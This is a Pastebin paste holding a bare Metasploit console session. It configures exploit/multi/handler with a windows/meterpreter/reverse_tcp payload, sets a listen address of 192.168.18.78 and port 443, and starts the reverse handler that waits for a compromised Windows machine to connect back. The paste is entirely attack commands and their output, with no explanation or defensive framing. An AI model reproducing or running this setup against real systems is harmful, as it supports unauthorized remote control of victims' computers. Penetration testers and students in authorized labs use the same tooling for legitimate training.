Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
- PAYLOAD => windows/meterpreter/reverse_tcp
- msf exploit(handler) > set LHOST 192.168.18.78
- LHOST => 192.168.18.78
- msf exploit(handler) > show options
- Module options (exploit/multi/handler):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- Payload options (windows/meterpreter/reverse_tcp):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- EXITFUNC process yes Exit technique: seh, thread, process, none
- LHOST 192.168.18.78 yes The listen address
- LPORT 443 yes The listen port
- Exploit target:
- Id Name
- -- ----
- 0 Wildcard Target
- msf exploit(handler) > run
- [*] Started reverse handler on 192.168.18.78:443
- [*] Starting the payload handler...
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement